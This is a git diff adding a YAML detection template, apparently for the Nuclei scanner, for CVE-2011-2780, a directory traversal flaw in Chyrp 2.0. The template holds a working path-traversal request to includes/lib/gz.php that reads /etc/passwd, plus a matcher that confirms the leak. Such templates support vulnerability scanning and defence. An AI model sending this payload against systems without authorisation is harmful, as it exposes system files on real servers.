diff --git a/cves/2011/CVE-2011-2780.yaml b/cves/2011/CVE-2011-2780.yaml new file mode 100644 index 0000000000..db72d7955c --- /dev/null +++ b/cves/2011/CVE-2011-2780.yaml @@ -0,0 +1,31 @@ +id: CVE-2011-2780 + +info: + name: Chyrp 2.x - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35946 + - https://www.cvedetails.com/cve/CVE-2011-2780 + tags: cve,cve2011,lfi + classification: + cvss-score: 5.0 + cve-id: CVE-2011-2780 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200